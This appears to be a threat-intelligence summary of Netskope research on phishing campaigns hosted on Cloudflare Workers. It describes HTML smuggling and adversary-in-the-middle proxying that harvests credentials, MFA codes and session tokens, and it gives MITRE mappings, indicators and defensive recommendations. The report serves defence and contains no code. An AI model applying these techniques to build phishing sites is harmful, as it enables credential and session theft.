Threat Research

Phishing with Cloudflare Workers: Transparent Phishing and HTML Smuggling

Netskope

Threat Labs tracks phishing campaigns that abuse Cloudflare Workers, employing two distinct techniques—HTML smuggling and transparent phishing—likely by different attackers. The campaigns target Netskope users across Asia, North America, and Southern Europe, with a growing variety of hosting apps and a focus on Microsoft login credentials alongside other services. #CloudflareWorkers #HTMLSmuggling

Keypoints

  • Two separate phishing campaigns use Cloudflare Workers: one uses HTML smuggling to evade network defenses, the other uses transparent phishing via a reverse proxy to capture credentials and tokens.
  • HTML smuggling encodes and reconstructs phishing pages on the client side to bypass inspection, avoiding static detection.
  • Transparent phishing acts as an adversary-in-the-middle proxy, capturing login data and forwarding it to the legitimate site while harvesting credentials, cookies, and tokens.
  • The number of distinct malicious apps hosted on Cloudflare Workers has continued to grow, with thousands of Netskope users targeted each quarter.
  • Targets span Asia, North America, and Southern Europe, across tech, financial services, and banking sectors, with Microsoft login pages being a primary target and Gmail, Yahoo Mail, and cPanel Webmail also affected.
  • Recommendations include inspecting all HTTP/HTTPS traffic, using URL filtering and threat protection, and considering Remote Browser Isolation for higher-risk sites.

MITRE Techniques

  • [T1027] Obfuscated/Compressed Files and Information – HTML smuggling encodes phishing payloads to evade detection; ‘The phishing page is initially encoded in base64 and then encoded multiple additional times to obfuscate the code and avoid static detection.’
  • [T1566] Phishing – Transparent phishing uses a proxy that collects credentials and forwards them to the legitimate site; ‘When victims enter their login credentials and multi-factor authentication code, the transparent phishing servers will collect and forward them to the target application, successfully logging the victim into the app while collecting credentials, cookies, and tokens along the way.’

Indicators of Compromise

  • [Domain] context – https://{application-name}.workers.dev, and workers.dev (template domain used by hosted apps)
  • [URL] context – https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Phishing/CloudflareWorkers, and https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling

Read more: https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling